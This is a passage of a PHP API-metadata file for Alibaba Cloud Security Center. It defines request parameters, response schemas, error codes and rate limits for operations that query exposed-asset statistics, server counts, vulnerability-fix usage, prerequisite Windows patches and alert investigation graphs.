'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset to query.', 'type' => 'string', 'required' => false, 'example' => 's-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'ExposureIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address that is exposed on the Internet for the asset to query.', 'type' => 'string', 'required' => false, 'example' => '116.12.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7CBAFB3F-1ED7-4A23-986A-6F67F0466BD1', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'StatisticsDetails' => [ 'description' => 'The list of gateway assets, exposed ports, exposed components, or public IP addresses.', 'type' => 'array', 'items' => [ 'title' => '', 'description' => 'The statistics information details.', 'type' => 'object', 'properties' => [ 'ExposureIp' => ['description' => 'The public IP address exposed on the Internet.', 'type' => 'string', 'example' => '123.57.XX.XX', 'title' => ''], 'ExposurePort' => ['description' => 'The port exposed on the Internet.', 'type' => 'string', 'example' => '22', 'title' => ''], 'ExposureTypeInstanceName' => ['description' => 'The name of the gateway asset exposed on the Internet.', 'type' => 'string', 'example' => 'ngw-bp1vkbju8f3w87c9v****', 'title' => ''], 'ExposedCount' => ['description' => 'The number of system vulnerability instances on your servers that are exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ExposureType' => ['description' => 'The expose type. Valid values:'."\n" .'- **INTERNET_IP**: public IP addresses of Elastic Compute Service (ECS) instances.'."\n" .'- **SLB**: public IP address of a load balancing SLB instance.'."\n" .'- **EIP**: elastic IP address (EIP).'."\n" .'- **DNAT**: NAT gateway that uses the DNAT feature to connect to the Internet.', 'type' => 'string', 'example' => 'SLB', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the asset.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'ExposureComponent' => ['description' => 'The system component exposed on the Internet.', 'type' => 'string', 'example' => 'tomcat', 'title' => ''], 'ExposureTypeId' => ['description' => 'The instance ID that corresponds to the expose type. Different expose types correspond to different instance IDs. Valid values:'."\n" .'- If **ExposureType** is **INTERNET_IP**: the value is empty.'."\n" .'- If **ExposureType** is **SLB**: the value is the ID of the load balancing public-facing instance.'."\n" .'- If **ExposureType** is **EIP**: the value is the ID of the EIP instance.'."\n" .'- If **ExposureType** is **DNAT**: the value is the ID of the NAT gateway instance.', 'type' => 'string', 'example' => 'lb-2ze4rso39h4nczcqs****', 'title' => ''], 'ForwardPort' => ['title' => '', 'description' => 'The redirection port.', 'type' => 'string', 'example' => '80'], ], 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Details of exposed asset statistics', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedStatisticsDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedStatisticsDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7CBAFB3F-1ED7-4A23-986A-6F67F0466BD1\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"StatisticsDetails\\": [\\n {\\n \\"ExposureIp\\": \\"123.57.XX.XX\\",\\n \\"ExposurePort\\": \\"22\\",\\n \\"ExposureTypeInstanceName\\": \\"ngw-bp1vkbju8f3w87c9v****\\",\\n \\"ExposedCount\\": 0,\\n \\"ExposureType\\": \\"SLB\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"ExposureComponent\\": \\"tomcat\\",\\n \\"ExposureTypeId\\": \\"lb-2ze4rso39h4nczcqs****\\",\\n \\"ForwardPort\\": \\"80\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeFieldStatistics' => [ 'summary' => 'Queries the statistics information of servers in your assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92081', 'abilityTreeNodes' => ['FEATUREsasGC725T'], ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region where the server resides.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of asset to query. If you do not specify an asset type, the statistics information of all asset types is queried. Valid values:'."\n" ."\n" .'- **ecs**: server'."\n" .'- **cloud_product**: cloud product.', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the Alibaba Cloud account of the member accounts in the resource directory.'."\n" .'>You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'GroupedFields' => [ 'description' => 'The statistics of server assets.', 'type' => 'object', 'properties' => [ 'OfflineInstanceCount' => ['description' => 'The number of offline servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '21', 'title' => ''], 'NoRiskInstanceCount' => ['description' => 'The number of assets without risky asset issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnKnowStatusInstanceCount' => ['description' => 'The number of assets with an unknown enabling status.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RegionCount' => ['description' => 'The number of regions to which the servers belong.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'NewInstanceCount' => ['description' => 'The number of newly added servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ExposedInstanceCount' => ['description' => 'The number of exposed assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GroupCount' => ['description' => 'The number of server groups.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TencentInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'GeneralAssetCount' => ['description' => 'The number of general assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'InstanceSyncTaskCount' => ['description' => 'The number of tasks under the asset type that you specified in the query. If you did not specify an asset type, this value is the total number of all servers and cloud products in your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnprotectedInstanceCount' => ['description' => 'The number of unprotected assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ImportantAssetCount' => ['description' => 'The number of important assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TestAssetCount' => ['description' => 'The number of test assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'VpcCount' => ['description' => 'The number of virtual private clouds (VPCs).', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'InstanceCount' => ['description' => 'The total number of assets under the asset type that you specified in the query. If you did not specify an asset type, this value is the total number of all servers and cloud products in your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'PauseInstanceCount' => ['description' => 'The number of paused servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'IdcInstanceCount' => ['description' => 'The number of assets that Security Center can detect.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'NotRunningStatusCount' => ['description' => 'The number of servers that are not started (powered off).', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AliYunInstanceCount' => ['description' => 'The number of assets that belong to Alibaba Cloud server groups.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of assets at risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '90', 'title' => ''], 'HuaweiInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AwsInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'OutMachineInstanceCount' => ['description' => 'The number of instances outside the cloud.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TripartiteInstanceCount' => ['description' => 'The number of simple application servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AzureInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'InstanceCoreCount' => ['description' => 'The total number of compute cores of all assets under the asset type that you specified in the query. If you did not specify an asset type, this value is the total number of compute cores of all servers and cloud products in your assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '301', 'title' => ''], 'RiskInstanceCoreCount' => ['description' => 'The number of compute cores of assets at risk.', 'type' => 'integer', 'format' => 'int64', 'example' => '201', 'title' => ''], 'ExposedInstanceCoreCount' => ['description' => 'The number of compute cores of exposed assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'UnprotectedInstanceCoreCount' => ['description' => 'The number of compute cores of unprotected assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'NotRunningStatusCoreCount' => ['description' => 'The number of compute cores of servers that are not started (powered off).', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'NewInstanceCoreCount' => ['description' => 'The number of compute cores of newly added servers.', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'NotBindMachineInstanceCount' => ['description' => 'The number of asset types without bound authorization under the asset type that you specified in the query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'VolcengineInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'GoogleInstanceCount' => ['description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'BaiduInstanceCount' => ['title' => '', 'description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'UcloudInstanceCount' => ['title' => '', 'description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'StateCloudInstanceCount' => ['title' => '', 'description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'KingsoftInstanceCount' => ['title' => '', 'description' => 'The number of third-party cloud servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5'], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query server statistics information in assets', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFieldStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeFieldStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"GroupedFields\\": {\\n \\"OfflineInstanceCount\\": 21,\\n \\"NoRiskInstanceCount\\": 10,\\n \\"UnKnowStatusInstanceCount\\": 1,\\n \\"RegionCount\\": 11,\\n \\"NewInstanceCount\\": 10,\\n \\"ExposedInstanceCount\\": 1,\\n \\"GroupCount\\": 20,\\n \\"TencentInstanceCount\\": 10,\\n \\"GeneralAssetCount\\": 10,\\n \\"InstanceSyncTaskCount\\": 10,\\n \\"UnprotectedInstanceCount\\": 10,\\n \\"ImportantAssetCount\\": 10,\\n \\"TestAssetCount\\": 10,\\n \\"VpcCount\\": 5,\\n \\"InstanceCount\\": 100,\\n \\"PauseInstanceCount\\": 10,\\n \\"IdcInstanceCount\\": 100,\\n \\"NotRunningStatusCount\\": 10,\\n \\"AliYunInstanceCount\\": 100,\\n \\"RiskInstanceCount\\": 90,\\n \\"HuaweiInstanceCount\\": 0,\\n \\"AwsInstanceCount\\": 100,\\n \\"OutMachineInstanceCount\\": 20,\\n \\"TripartiteInstanceCount\\": 2,\\n \\"AzureInstanceCount\\": 5,\\n \\"InstanceCoreCount\\": 301,\\n \\"RiskInstanceCoreCount\\": 201,\\n \\"ExposedInstanceCoreCount\\": 30,\\n \\"UnprotectedInstanceCoreCount\\": 30,\\n \\"NotRunningStatusCoreCount\\": 30,\\n \\"NewInstanceCoreCount\\": 30,\\n \\"NotBindMachineInstanceCount\\": 10,\\n \\"VolcengineInstanceCount\\": 10,\\n \\"GoogleInstanceCount\\": 10,\\n \\"BaiduInstanceCount\\": 5,\\n \\"UcloudInstanceCount\\": 5,\\n \\"StateCloudInstanceCount\\": 5,\\n \\"KingsoftInstanceCount\\": 5\\n }\\n}","type":"json"}]', ], 'DescribeFixUsedCount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'UsedCountSg' => ['description' => 'The number of vulnerability fixes used in regions outside the Chinese mainland.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'UsedCountCn' => ['description' => 'The number of vulnerability fixes used in regions in the Chinese mainland.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'CB1CE824-7F80-546D-8AF8-4A5209F9B698', 'title' => ''], 'UsedCount' => ['description' => 'The number of vulnerability fixes used.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of vulnerability fixes used by a pay-as-you-go user', 'summary' => 'Queries the number of vulnerability fixes used by a pay-as-you-go user.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFixUsedCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeFixUsedCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"UsedCountSg\\": 5,\\n \\"UsedCountCn\\": 5,\\n \\"RequestId\\": \\"CB1CE824-7F80-546D-8AF8-4A5209F9B698\\",\\n \\"UsedCount\\": 10\\n}","type":"json"}]', ], 'DescribeFrontVulPatchList' => [ 'summary' => 'Queries the list of prerequisite patches that must be installed for a specified Windows system vulnerability.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Info', 'in' => 'query', 'schema' => ['description' => 'The information about the Windows system vulnerability to query. The value is a JSON string that contains the following fields:'."\n" .'- **name**: the vulnerability name.'."\n" .'- **uuid**: the UUID of the server that has the vulnerability.'."\n" .'- **tag**: the vulnerability tag. Set this field to **system**, which indicates a system vulnerability.', 'type' => 'string', 'required' => true, 'example' => '[{"name":"5000803","uuid":"026c9296-1234-5678-b937-a7d81f05****","tag":"system"}]', 'title' => ''], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The method to handle the vulnerability. Set this parameter to **vul_fix**, which indicates fixing the vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'vul_fix', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Set this parameter to **sys**, which indicates a Windows vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'sys', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F929E952-EBFC-56C3-BD35-BF8B59024C68', 'title' => ''], 'FrontPatchList' => [ 'description' => 'The information about the prerequisite patches for the Windows vulnerability.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '1587bedb-fdb4-48c4-9330-4545****', 'title' => ''], 'PatchList' => [ 'description' => 'The list of prerequisite patches for the Windows vulnerability on the server.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The patch number of the prerequisite patch for the Windows vulnerability.', 'type' => 'string', 'example' => '4523204', 'title' => ''], 'AliasName' => ['description' => 'The vulnerability name.', 'type' => 'string', 'example' => 'RHBA-2019:2599: krb5 bug fix update', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query prerequisite patches for a specified windows system vulnerability', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFrontVulPatchList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeFrontVulPatchList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F929E952-EBFC-56C3-BD35-BF8B59024C68\\",\\n \\"FrontPatchList\\": [\\n {\\n \\"Uuid\\": \\"1587bedb-fdb4-48c4-9330-4545****\\",\\n \\"PatchList\\": [\\n {\\n \\"Name\\": \\"4523204\\",\\n \\"AliasName\\": \\"RHBA-2019:2599: krb5 bug fix update\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeGraph4InvestigationOnline' => [ 'summary' => 'Queries the investigation and tracing graph of Cloud Workload Protection Platform (CWPP) alert events to visually investigate and reconstruct cyberattack processes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92083', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The namespace of the graph. Set this parameter to hundun_dc_online.', 'type' => 'string', 'required' => true, 'example' => 'hundun_dc_online'], ], [ 'name' => 'AnomalyUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset associated with the alert event. You can call [DescribeSuspEvents](~~DescribeSuspEvents~~) to obtain the asset UUID. The value is in the data.SuspEvents[index].Uuid path.', 'type' => 'string', 'required' => false, 'example' => '3502e4b0-f362-4059-84a2-f47fa2b5exxx', 'title' => ''], ], [ 'name' => 'AnomalyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event. You can call [DescribeSuspEvents](~~DescribeSuspEvents~~) to obtain the alert event ID. The value is in the data.SuspEvents[index].UniqueInfo path.', 'type' => 'string', 'required' => false, 'example' => '786fc80896b25422b5324cb6e57bxxxx', 'title' => ''], ], [ 'name' => 'VertexId', 'in' => 'query', 'schema' => ['description' => 'The vertex ID. You do not need to specify this parameter.', 'type' => 'string', 'required' => false, 'example' => '29872354f741b1b044b8a9b4e2ab****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'EntityTypeList' => [ 'description' => 'The list of vertex types.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'DisplayOrder' => ['description' => 'The display order.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'DisplayColor' => ['description' => 'The rendering color of the vertex.', 'type' => 'string', 'example' => '#fff', 'title' => ''], 'DisplayIcon' => ['description' => 'The icon of the vertex.', 'type' => 'string', 'example' => 'https://img.alicdn.com/tfs/TB176P5OgDqK1RjSZSyXXaxEVXa-49-48.png', 'title' => ''], 'Name' => ['description' => 'The name of the vertex.', 'type' => 'string', 'example' => 'alert', 'title' => ''], 'Id' => ['description' => 'The ID of the node type.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EdgeList' => [ 'description' => 'The list of edges.', 'type' => 'array', 'items' => [ 'description' => 'The endpoint of the edge.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the edge.', 'type' => 'string', 'example' => 'bash->apt-get', 'title' => ''], 'EndId' => ['description' => 'The ID of the end vertex of the edge.', 'type' => 'string', 'example' => 'f944c2362c7e111dee16f0e70ad2xxxx', 'title' => ''], 'EndType' => ['description' => 'The type of the end vertex of the edge. Valid values include but are not limited to:'."\n" .'- **process**: process'."\n" .'- **file**: file'."\n" .'- **alert**: alert'."\n" .'- **ip**: IP address'."\n" .'- **domain**: domain name.', 'type' => 'string', 'example' => 'process', 'title' => ''], 'StartId' => ['description' => 'The ID of the start vertex of the edge.', 'type' => 'string', 'example' => 'f944c2362c7e111dee16f0e70ad2xxxx', 'title' => ''], 'StartType' => ['description' => 'The type of the start vertex of the edge. Valid values include but are not limited to:'."\n" .'- **process**: process'."\n" .'- **file**: file'."\n" .'- **alert**: alert'."\n" .'- **ip**: IP address'."\n" .'- **domain**: domain name.', 'type' => 'string', 'example' => 'file', 'title' => ''], 'Time' => ['description' => 'The time when the edge was created.', 'type' => 'string', 'example' => '2024-07-01 15:25:46', 'title' => ''], 'Type' => ['description' => 'The type of the edge.', 'type' => 'string', 'example' => 'process_spawn_process', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VertexList' => [ 'description' => 'The list of vertices.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['title' => '', 'description' => 'The UUID of the asset.', 'type' => 'string', 'example' => '5c081b02-f66a-47a4-bd2f-79ee3eafxxxx'], 'Type' => ['title' => '', 'description' => 'The type of the vertex.', 'type' => 'string', 'example' => 'alert'], 'Name' => ['title' => '', 'description' => 'The name of the vertex.', 'type' => 'string', 'example' => '1a79b3a10ad5e6cad090dd697a7axxxxx'], 'Time' => ['title' => '', 'description' => 'The time.', 'type' => 'string', 'example' => '2024-07-02 16:14:01'], 'Properties' => ['title' => '', 'description' => 'The properties.', 'type' => 'string', 'example' => '{\'DomainName\': {\'SupportScratchDetection\': False, \'Description\': \'The name of the domain.\', \'Required\': True, \'UpdateAllowed\': False, \'Type\': \'string\', \'Immutable\': False}}'], 'NeighborList' => [ 'description' => 'The list of vertices adjacent to the current vertex.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'HasMore' => ['title' => '', 'description' => 'Indicates whether more adjacent vertices exist.', 'type' => 'boolean', 'example' => 'False'], 'Count' => ['title' => '', 'description' => 'The number of adjacent nodes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'Type' => ['title' => '', 'description' => 'The type of the neighbor node.', 'type' => 'string', 'example' => 'alert'], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RelationTypeList' => [ 'description' => 'The list of edge types.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the edge.', 'type' => 'string', 'example' => 'spawn process', 'title' => ''], 'Directed' => ['description' => 'The direction of the edge. Valid values:'."\n" .'- **1**: forward'."\n" .'- **0**: reverse.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'DisplayColor' => ['description' => 'The rendering color of the edge.', 'type' => 'string', 'example' => '#fff', 'title' => ''], 'DisplayIcon' => ['description' => 'The icon style of the edge.', 'type' => 'string', 'example' => 'https://img.alicdn.com/imgextra/i4/O1CN01ft6rvQ22uUX2JsTmv_!!6000000007180-55-tps-12-12.svg', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the investigation and tracing graph of alert events', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGraph4InvestigationOnline'], ], 'product' => 